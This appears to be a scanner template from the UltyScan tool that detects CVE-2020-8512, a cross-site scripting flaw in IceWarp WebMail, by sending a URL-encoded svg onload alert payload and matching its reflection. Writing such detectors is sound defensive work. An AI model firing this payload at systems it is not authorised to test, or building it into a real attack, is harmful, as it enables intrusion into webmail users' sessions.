Files
UltyScan/templates/active/CVE-2020-8512_-_IceWarp_WebMail_XSS.sh

9 lines
305 B
Bash

AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8512 - IceWarp WebMail XSS'
URI="/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22"
METHOD='GET'
MATCH="<svg\/onload\=alert\(document\.domain\)>"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'